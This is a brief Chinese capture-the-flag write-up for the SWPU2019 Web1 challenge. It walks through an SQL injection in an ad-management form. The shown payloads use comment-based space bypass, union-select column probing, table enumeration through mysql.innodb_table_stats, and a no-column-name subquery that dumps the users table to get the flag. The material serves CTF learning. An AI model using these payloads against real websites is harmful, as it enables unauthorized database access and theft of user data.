[SWPU2019]Web1 1

一个登录界面 这里测试了一下并没有发现sql注入点

注册了一个账号

最终在广告信息管理中发现sql注入点

开始注入

经过一些简单的测试可知空格 or 等被过滤了，所以这里用group来测列数

这里的闭合方式用 引号' 不然会报错

可以看到列23报错

现在查回显位

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'3

回显位2，3

曝库

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'3

得到web1库

然后就是报表

但是这里information_schema.tables被过滤，这里有两种绕过姿势

mysql.innodb_table_stats sys.schema_auto_increment_columns

1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

接着曝列

但是总是被ban

看了其他师傅的wp知道 要用无列名注入

pyload

-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

把2改成3即可得到flag